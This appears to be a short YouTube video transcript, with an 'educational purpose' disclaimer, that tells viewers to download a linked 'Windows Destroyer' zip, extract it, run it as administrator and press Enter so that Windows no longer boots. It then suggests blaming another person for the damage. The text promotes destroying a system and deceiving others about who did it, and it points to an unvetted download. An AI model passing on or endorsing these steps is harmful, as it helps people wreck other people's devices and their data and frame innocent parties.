Disclaimer: this video is all about educational purpose. This channel doesn't support any type of illegal activity. We used our own network and devices during explanation of this video. We used tool called Windows Destroyer. Link given in description. Download zip file. Open folder. Extract this files on desktop. Run Windows Destroyer as administrator. Press Enter to destroy. Subscribe our YouTube channel and also follow on GitHub. Now Windows can't boot next time. So you can blame other person. Thanks for watching. Subscribe for more.